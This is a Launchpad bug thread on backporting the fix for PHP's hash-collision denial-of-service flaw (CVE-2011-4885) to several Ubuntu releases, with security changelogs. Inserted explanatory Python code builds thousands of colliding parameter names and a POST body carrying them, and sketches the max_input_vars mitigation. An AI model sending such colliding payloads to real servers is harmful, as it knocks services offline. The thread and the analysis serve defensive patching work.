Please backport the upstream patch to prevent attacks based on hash collisions

Bug #910296 reported by Qishuai Liu
Affects          Status        Importance  Assigned to
php5 (Ubuntu)    Fix Released  Medium      Unassigned
  Hardy          Fix Released  Medium      Steve Beattie
  Lucid          Fix Released  Medium      Steve Beattie
  Maverick       Fix Released  Medium      Steve Beattie
  Natty          Fix Released  Medium      Steve Beattie
  Oneiric        Fix Released  Medium      Steve Beattie
  Precise        Fix Released  Medium      Unassigned

Bug Description

According to CVE-2011-4885: PHP before 5.3.9 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.

CVE link: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4885

upstream php changes: http://svn.php.net/viewvc?view=revision&revision=321003
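The mechanism behind CVE-2011-4885, as an added example that is not part of the bug report or of PHP's own code: PHP 5's zend_inline_hash_func is DJBX33A (h = h*33 + c, seeded with 5381, 32-bit arithmetic), and the request-variable table is chained, so n parameter names that share one hash cost O(n^2) key comparisons to insert. The two-byte block trick ("Ez" and "FY" collide, and any concatenation of equal-length colliding blocks collides too), the toy chained table and the 2^16 bucket count are this example's own assumptions, not PHP internals.

```python
import random
import string

MASK32 = 0xFFFFFFFF


def djbx33a(key: bytes) -> int:
    """PHP 5's zend_inline_hash_func (DJBX33A) with 32-bit unsigned wraparound."""
    h = 5381
    for c in key:
        h = ((h << 5) + h + c) & MASK32
    return h


def colliding_keys(n_blocks: int) -> list:
    """Return 2**n_blocks distinct parameter names sharing one DJBX33A hash.

    b"Ez" and b"FY" are equal-length blocks with equal hash.  DJBX33A is a
    polynomial in 33, so any concatenation of equal-length, equal-hash blocks
    hashes to the same 32-bit value: the names collide on the full hash, hence
    on the same bucket whatever the table size.
    """
    blocks = (b"Ez", b"FY")
    assert djbx33a(blocks[0]) == djbx33a(blocks[1])
    keys = [b""]
    for _ in range(n_blocks):
        keys = [k + b for k in keys for b in blocks]
    return keys


def random_keys(n: int, length: int = 12, seed: int = 1) -> list:
    """Benign comparison set: n seeded pseudo-random ASCII parameter names (constructed)."""
    rng = random.Random(seed)
    return ["".join(rng.choice(string.ascii_letters) for _ in range(length)).encode("ascii")
            for _ in range(n)]


def insertion_cost(keys: list, n_buckets: int = 1 << 16) -> int:
    """Insert keys into a toy chained table of n_buckets (a power of two) and
    return the number of key comparisons made.  As in a zend_hash insert, each
    new key is compared against every key already in its bucket's chain."""
    assert n_buckets & (n_buckets - 1) == 0
    buckets = [[] for _ in range(n_buckets)]
    comparisons = 0
    for key in keys:
        chain = buckets[djbx33a(key) & (n_buckets - 1)]
        for existing in chain:
            comparisons += 1
            if existing == key:
                break  # duplicate name: value would be overwritten
        else:
            chain.append(key)
    return comparisons


def post_body(keys: list) -> bytes:
    """Constructed application/x-www-form-urlencoded body carrying the names."""
    return b"&".join(k + b"=1" for k in keys)


if __name__ == "__main__":
    attack, benign = colliding_keys(11), random_keys(1 << 11)
    print("colliding names:", len(attack),
          "distinct hashes:", len({djbx33a(k) for k in attack}))
    print("comparisons, colliding:", insertion_cost(attack))
    print("comparisons, random   :", insertion_cost(benign))
    print("POST body size:", len(post_body(attack)), "bytes")
```

With 2048 colliding names the table does 2048*2047/2 comparisons while the same number of random names costs a few dozen; doubling the block count squares nothing new, it just doubles n and quadruples the work, which is why a body of a few hundred kilobytes is enough to pin a CPU core.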

visibility: private → public
Changed in php5 (Ubuntu Hardy):
status: New → Confirmed
Changed in php5 (Ubuntu Lucid):
status: New → Confirmed
Changed in php5 (Ubuntu Maverick):
status: New → Confirmed
Changed in php5 (Ubuntu Natty):
status: New → Confirmed
Changed in php5 (Ubuntu Oneiric):
status: New → Confirmed
Changed in php5 (Ubuntu Precise):
status: New → Confirmed
Changed in php5 (Ubuntu Hardy):
importance: Undecided → Medium
Changed in php5 (Ubuntu Lucid):
importance: Undecided → Medium
Changed in php5 (Ubuntu Maverick):
importance: Undecided → Medium
Changed in php5 (Ubuntu Natty):
importance: Undecided → Medium
Changed in php5 (Ubuntu Oneiric):
importance: Undecided → Medium
Changed in php5 (Ubuntu Precise):
importance: Undecided → Medium
Ted Reed (treed) wrote:

You actually need two commits for this fix.

This one is the 5.3 branch commit for the first commit:

http://svn.php.net/viewvc?view=revision&revision=321038

There was a fix to that commit later:

http://svn.php.net/viewvc?view=revision&revision=321335

I've combined both of these patches into one patch that can be applied to 5.3.2-1ubuntu4.11:

https://gist.github.com/1610477

Should just be able to drop it into debian/patches and add it to the end of debian/patches/series.

I'm still confirming if that patch fixes the DoS.

Ted Reed (treed) wrote:

Also, I might bump this up a little higher than medium. This is a verified bug with trivially reproducible DoS capability.

Ted Reed (treed) wrote:

Initial testing shows a crash from the error message there. A version with the error message pulled out seems to be functioning.

There may be additional code from 5.3.9 that the Ubuntu version doesn't have and needs to support the error message.

Geoff Flarity (geoff-flarity) wrote:

This should really be fixed soon. Please up vote it!

BTW, watch out, the fix caused an even worse (remote code execution) bug:

https://bugzilla.redhat.com/show_bug.cgi?id=786686

Steve Beattie (sbeattie) wrote:

Thanks for reporting this; I am currently working on the update to fix this and other open php issues. I'm aware of the introduced vulnerability CVE-2012-0830 that the fix for this issue introduced (Tom Reed's patch above includes the vulnerability). It's addressed upstream by http://svn.php.net/viewvc?view=revision&revision=323007, plus there's an additional memory leak addressed by http://svn.php.net/viewvc?view=revision&revision=323013.

Changed in php5 (Ubuntu Lucid):
assignee: nobody → Steve Beattie (sbeattie)
Changed in php5 (Ubuntu Hardy):
assignee: nobody → Steve Beattie (sbeattie)
Changed in php5 (Ubuntu Natty):
assignee: nobody → Steve Beattie (sbeattie)
Changed in php5 (Ubuntu Maverick):
assignee: nobody → Steve Beattie (sbeattie)
Changed in php5 (Ubuntu Oneiric):
assignee: nobody → Steve Beattie (sbeattie)
Ondřej Surý (ondrej) wrote:

Why not cherry-pick from Debian? (That way you can also check if I haven't missed anything on your radar.)

Launchpad Janitor (janitor) wrote:

This bug was fixed in the package php5 - 5.3.6-13ubuntu3.5

---------------
php5 (5.3.6-13ubuntu3.5) oneiric-security; urgency=low

  * SECURITY UPDATE: memory allocation failure denial of service
    - debian/patches/php5-CVE-2011-4153.patch: check result of
      zend_strdup() and calloc() for failed allocations
    - CVE-2011-4153
  * SECURITY UPDATE: predictable hash collision denial of service
    (LP: #910296)
    - debian/patches/php5-CVE-2011-4885.patch: add max_input_vars
      directive with default limit of 1000
    - ATTENTION: this update changes previous php5 behavior by
      limiting the number of external input variables to 1000.
      This may be increased by adding a "max_input_vars"
      directive to the php.ini configuration file. See
      http://www.php.net/manual/en/info.configuration.php#ini.max-input-vars
      for more information.
    - CVE-2011-4885
  * SECURITY UPDATE: remote code execution vulnerability introduced by
    the fix for CVE-2011-4885 (LP: #925772)
    - debian/patches/php5-CVE-2012-0830.patch: return rather than
      continuing if max_input_vars limit is reached
    - CVE-2012-0830
  * SECURITY UPDATE: XSLT arbitrary file overwrite attack
    - debian/patches/php5-CVE-2012-0057.patch: add xsl.security_prefs
      ini option to define forbidden operations within XSLT stylesheets
    - CVE-2012-0057
  * SECURITY UPDATE: PDORow session denial of service
    - debian/patches/php5-CVE-2012-0788.patch: fail gracefully when
      attempting to serialize PDORow instances
    - CVE-2012-0788
  * SECURITY UPDATE: magic_quotes_gpc remote disable vulnerability
    - debian/patches/php5-CVE-2012-0831.patch: always restore
      magic_quote_gpc on request shutdown
    - CVE-2012-0831
 -- Steve Beattie <email address hidden> Wed, 08 Feb 2012 20:56:28 -0800

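The shape of the max_input_vars mitigation described in the changelog above, as an added example that is not from the bug report, the Ubuntu patches or PHP's source: a form-data decoder registers at most max_input_vars variables, and when the cap is hit it warns once and returns what it has (the "return rather than continuing" of the CVE-2012-0830 follow-up), instead of skipping that pair and carrying on. A small php.ini reader is included so the effective limit can be confirmed after the update. The default of 1000 is the one the update ships; the warning wording, the ini parsing and the decoder itself are this example's own assumptions, and the memory-corruption detail of CVE-2012-0830 is not reproduced here.

```python
import warnings
from collections import namedtuple
from urllib.parse import unquote_plus

DEFAULT_MAX_INPUT_VARS = 1000  # default limit introduced by the update

ParsedInput = namedtuple("ParsedInput", "vars truncated")


class InputVarsLimitExceeded(UserWarning):
    """Emitted once per request when max_input_vars is reached."""


def treat_data(body: str, max_input_vars: int = DEFAULT_MAX_INPUT_VARS) -> ParsedInput:
    """Decode application/x-www-form-urlencoded data, registering at most
    max_input_vars variables.  Every name=value pair counts as one variable,
    array syntax such as a[]=1 included.  When the (max_input_vars+1)-th pair
    arrives: warn once and return what was registered so far.  Do not skip
    the pair and keep parsing."""
    registered = {}
    count = 0
    for pair in body.split("&"):
        if pair == "":
            continue  # empty pair from "a=1&&b=2": nothing to register
        if count >= max_input_vars:
            warnings.warn(
                "Input variables exceeded %d. To increase the limit change "
                "max_input_vars in php.ini." % max_input_vars,
                InputVarsLimitExceeded)
            return ParsedInput(registered, True)
        name, _, value = pair.partition("=")
        registered[unquote_plus(name)] = unquote_plus(value)
        count += 1
    return ParsedInput(registered, False)


def max_input_vars_from_ini(ini_text: str) -> int:
    """Return the effective max_input_vars from php.ini text.  The last
    uncommented assignment wins; quotes and trailing ';' comments are
    stripped; a missing directive means the built-in default."""
    value = DEFAULT_MAX_INPUT_VARS
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#[":
            continue
        key, sep, rest = line.partition("=")
        if not sep or key.strip() != "max_input_vars":
            continue
        rest = rest.split(";", 1)[0].strip().strip("\"'")
        if rest.isdigit():
            value = int(rest)
    return value


if __name__ == "__main__":
    # Constructed php.ini excerpt and request body.
    ini = "; php.ini excerpt\nmax_input_vars = 2000\n"
    limit = max_input_vars_from_ini(ini)
    body = "&".join("k%d=v" % i for i in range(limit + 5))
    parsed = treat_data(body, limit)
    print("limit:", limit, "registered:", len(parsed.vars),
          "truncated:", parsed.truncated)
```

The cap bounds the work of the hash-collision attack only because parsing stops at the limit: a decoder that merely skipped the excess pairs would still have to tokenize and hash the whole body, and an application that needs more than 1000 fields per request raises max_input_vars in php.ini rather than removing the check.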
Launchpad Janitor (janitor) wrote:

This bug was fixed in the package php5 - 5.3.5-1ubuntu7.6

---------------
php5 (5.3.5-1ubuntu7.6) natty-security; urgency=low

  * SECURITY UPDATE: memory allocation failure denial of service
    - debian/patches/php5-CVE-2011-4153.patch: check result of
      zend_strdup() and calloc() for failed allocations
    - CVE-2011-4153
  * SECURITY UPDATE: predictable hash collision denial of service
    (LP: #910296)
    - debian/patches/php5-CVE-2011-4885.patch: add max_input_vars
      directive with default limit of 1000
    - ATTENTION: this update changes previous php5 behavior by
      limiting the number of external input variables to 1000.
      This may be increased by adding a "max_input_vars"
      directive to the php.ini configuration file. See
      http://www.php.net/manual/en/info.configuration.php#ini.max-input-vars
      for more information.
    - CVE-2011-4885
  * SECURITY UPDATE: remote code execution vulnerability introduced by
    the fix for CVE-2011-4885 (LP: #925772)
    - debian/patches/php5-CVE-2012-0830.patch: return rather than
      continuing if max_input_vars limit is reached
    - CVE-2012-0830
  * SECURITY UPDATE: XSLT arbitrary file overwrite attack
    - debian/patches/php5-CVE-2012-0057.patch: add xsl.security_prefs
      ini option to define forbidden operations within XSLT stylesheets
    - CVE-2012-0057
  * SECURITY UPDATE: PDORow session denial of service
    - debian/patches/php5-CVE-2012-0788.patch: fail gracefully when
      attempting to serialize PDORow instances
    - CVE-2012-0788
  * SECURITY UPDATE: magic_quotes_gpc remote disable vulnerability
    - debian/patches/php5-CVE-2012-0831.patch: always restore
      magic_quote_gpc on request shutdown
    - CVE-2012-0831
 -- Steve Beattie <email address hidden> Wed, 08 Feb 2012 20:58:41 -0800

Launchpad Janitor (janitor) wrote:

This bug was fixed in the package php5 - 5.3.3-1ubuntu9.9

---------------
php5 (5.3.3-1ubuntu9.9) maverick-security; urgency=low

  * SECURITY UPDATE: memory allocation failure denial of service
    - debian/patches/php5-CVE-2011-4153.patch: check result of
      zend_strdup() and calloc() for failed allocations
    - CVE-2011-4153
  * SECURITY UPDATE: predictable hash collision denial of service
    (LP: #910296)
    - debian/patches/php5-CVE-2011-4885.patch: add max_input_vars
      directive with default limit of 1000
    - ATTENTION: this update changes previous php5 behavior by
      limiting the number of external input variables to 1000.
      This may be increased by adding a "max_input_vars"
      directive to the php.ini configuration file. See
      http://www.php.net/manual/en/info.configuration.php#ini.max-input-vars
      for more information.
    - CVE-2011-4885
  * SECURITY UPDATE: remote code execution vulnerability introduced by
    the fix for CVE-2011-4885 (LP: #925772)
    - debian/patches/php5-CVE-2012-0830.patch: return rather than
      continuing if max_input_vars limit is reached
    - CVE-2012-0830
  * SECURITY UPDATE: XSLT arbitrary file overwrite attack
    - debian/patches/php5-CVE-2012-0057.patch: add xsl.security_prefs
      ini option to define forbidden operations within XSLT stylesheets
    - CVE-2012-0057
  * SECURITY UPDATE: PDORow session denial of service
    - debian/patches/php5-CVE-2012-0788.patch: fail gracefully when
      attempting to serialize PDORow instances
    - CVE-2012-0788
  * SECURITY UPDATE: magic_quotes_gpc remote disable vulnerability
    - debian/patches/php5-CVE-2012-0831.patch: always restore
      magic_quote_gpc on request shutdown
    - CVE-2012-0831
 -- Steve Beattie <email address hidden> Wed, 08 Feb 2012 20:59:18 -0800

Changed in php5 (Ubuntu Maverick):
status: Confirmed → Fix Released
Changed in php5 (Ubuntu Natty):
status: Confirmed → Fix Released
Changed in php5 (Ubuntu Oneiric):
status: Confirmed → Fix Released
Launchpad Janitor (janitor) wrote:

This bug was fixed in the package php5 - 5.3.2-1ubuntu4.13

---------------
php5 (5.3.2-1ubuntu4.13) lucid-security; urgency=low

  * SECURITY UPDATE: memory allocation failure denial of service
    - debian/patches/php5-CVE-2011-4153.patch: check result of
      zend_strdup() and calloc() for failed allocations
    - CVE-2011-4153
  * SECURITY UPDATE: predictable hash collision denial of service
    (LP: #910296)
    - debian/patches/php5-CVE-2011-4885.patch: add max_input_vars
      directive with default limit of 1000
    - ATTENTION: this update changes previous php5 behavior by
      limiting the number of external input variables to 1000.
      This may be increased by adding a "max_input_vars"
      directive to the php.ini configuration file. See
      http://www.php.net/manual/en/info.configuration.php#ini.max-input-vars
      for more information.
    - CVE-2011-4885
  * SECURITY UPDATE: remote code execution vulnerability introduced by
    the fix for CVE-2011-4885 (LP: #925772)
    - debian/patches/php5-CVE-2012-0830.patch: return rather than
      continuing if max_input_vars limit is reached
    - CVE-2012-0830
  * SECURITY UPDATE: XSLT arbitrary file overwrite attack
    - debian/patches/php5-CVE-2012-0057.patch: add xsl.security_prefs
      ini option to define forbidden operations within XSLT stylesheets
    - CVE-2012-0057
  * SECURITY UPDATE: PDORow session denial of service
    - debian/patches/php5-CVE-2012-0788.patch: fail gracefully when
      attempting to serialize PDORow instances
    - CVE-2012-0788
  * SECURITY UPDATE: magic_quotes_gpc remote disable vulnerability
    - debian/patches/php5-CVE-2012-0831.patch: always restore
      magic_quote_gpc on request shutdown
    - CVE-2012-0831
  * SECURITY UPDATE: arbitrary files removal via cronjob
    - debian/php5-common.php5.cron.d: take greater care when removing
      session files (overlooked in a previous update).
    - http://git.debian.org/?p=pkg-php%2Fphp.git;a=commitdiff_plain;h=d09fd04ed7bfcf7f008360c6a42025108925df09
    - CVE-2011-0441
 -- Steve Beattie <email address hidden> Wed, 08 Feb 2012 20:55:57 -0800

Changed in php5 (Ubuntu Lucid):
status: Confirmed → Fix Released
Greg Knaddison (greg-growingventuresolutions) wrote:

According to this issue it is not yet released for Hardy nor Precise, but the announcement for 5.2.4-2ubuntu5.22 says it is: https://launchpad.net/ubuntu/+source/php5/5.2.4-2ubuntu5.22

Was that tracked somewhere else and this issue just needs to be updated?

Related question: I searched for the bug for the remote arbitrary code execution that this fix introduced (PHP 5.3.10, CVE-2012-0830) and couldn't find it.

Steve Beattie (sbeattie) wrote:

Yes, this has been fixed in hardy (8.04 LTS); however, I forgot to incorporate the bug number in the changelog entry for the hardy version. You are correct that this issue has not been addressed in precise, yet.

As for CVE-2012-0830, there is no separate bug report; the security team doesn't track all security issues via bug reports due to some inadequacies in launchpad. Issues are tracked publicly in the Ubuntu CVE tracker at http://people.canonical.com/~ubuntu-security/cve/ .

Thanks!

Changed in php5 (Ubuntu Hardy):
status: Confirmed → Fix Released
Steve Beattie (sbeattie) wrote:

This was addressed in precise in the 5.3.10-1ubuntu1 merge, closing.

Changed in php5 (Ubuntu Precise):
status: Confirmed → Fix Released